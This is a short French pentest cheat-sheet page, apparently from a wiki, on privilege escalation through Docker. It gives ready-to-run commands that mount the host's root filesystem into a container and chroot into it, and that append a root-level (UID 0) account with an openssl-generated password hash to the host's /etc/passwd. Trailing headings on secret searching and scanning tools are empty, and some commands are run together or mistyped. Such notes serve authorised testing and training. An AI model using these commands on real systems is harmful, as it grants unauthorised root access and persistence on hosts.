⛴️Docker
Privesc
Privesc rapide
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bashPrivesc par création d'un nouveau utilisateur
docker run -v /etc/:/mnt -it <debian>
cd /mnt
cat passwdopenssl passwd -1 -salt <username>
Password:
$1$<username>$...docker run -v /etc/:/mnt/ -it <debian>
cd /mnt
echo '<username>:<saltpasswd>:0:0::/root:/bin/bash' >> passwd
tall passwd
su <username>
idRecherche de secrets
Extraire un fichier
Outils
Grype
Docker Bench Security
Mis à jour